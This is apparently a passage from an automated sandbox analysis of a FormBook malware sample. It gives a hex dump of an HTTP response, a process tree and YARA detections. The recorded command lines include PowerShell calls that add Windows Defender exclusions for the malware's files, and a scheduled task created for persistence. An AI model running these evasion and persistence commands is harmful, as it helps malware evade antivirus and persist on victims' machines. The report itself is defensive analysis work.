                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75
                                                                    Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: HAWB AND INV.exe PID: 6752 Parent PID: 6012

                                                                    General

                                                                    Start time:14:52:19
                                                                    Start date:03/05/2021
                                                                    Path:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0x970000
                                                                    File size:741376 bytes
                                                                    MD5 hash:42662765A94CE5ECE11529509F937711
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Analysis Process: powershell.exe PID: 6932 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:24
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 6948 Parent PID: 6932

                                                                    General

                                                                    Start time:14:52:24
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: powershell.exe PID: 7020 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 7064 Parent PID: 7020

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: schtasks.exe PID: 7072 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
                                                                    Imagebase:0xe0000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 7080 Parent PID: 7072

                                                                    General

                                                                    Start time:14:52:25
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: powershell.exe PID: 4592 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:26
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
                                                                    Imagebase:0xd30000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 4756 Parent PID: 4592

                                                                    General

                                                                    Start time:14:52:27
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: HAWB AND INV.exe PID: 6156 Parent PID: 6752

                                                                    General

                                                                    Start time:14:52:27
                                                                    Start date:03/05/2021
                                                                    Path:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\HAWB AND INV.exe
                                                                    Imagebase:0x750000
                                                                    File size:741376 bytes
                                                                    MD5 hash:42662765A94CE5ECE11529509F937711
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Analysis Process: explorer.exe PID: 3440 Parent PID: 6156

                                                                    General

                                                                    Start time:14:52:30
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: ipconfig.exe PID: 6556 Parent PID: 3440

                                                                    General

                                                                    Start time:14:53:23
                                                                    Start date:03/05/2021
                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                    Imagebase:0xaa0000
                                                                    File size:29184 bytes
                                                                    MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >